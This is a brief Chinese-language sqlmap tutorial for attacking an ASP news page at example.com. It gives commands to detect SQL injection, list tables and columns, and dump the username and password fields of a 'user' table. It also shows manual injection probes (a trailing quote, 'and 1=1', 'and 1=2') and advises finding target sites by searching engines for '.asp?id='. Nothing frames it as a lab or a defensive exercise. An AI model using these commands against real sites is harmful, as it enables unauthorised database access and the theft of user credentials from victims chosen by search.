目标网站:http://www.example.com/news.asp?id=110
sqlmap -u "http://www.example.com/news.asp?id=110" -u检测是否存在注入
返回数据库的名字
sqlmap -u "http://www.example.com/news.asp?id=110" --tables列出user表的所有字段
sqlmap -u "http://www.example.com/news.asp?id=110" --columns -T "user"列出user表username,password字段中的所有记录并下载
sqlmap -u "http://www.example.com/news.asp?id=110" --dump -C "username,password" -T "user"--dump 下载数据
-C "username,password" 字段名
注:
- 获取目标asp网站可在搜索引擎搜索
.asp?id=
判断是否存在注入漏洞:
http://www.example.com/news.asp?id=110'返回错误
http://www.example.com/news.asp?id=110 and 1=1返回正常
http://www.example.com/news.asp?id=110 and 1=2返回错误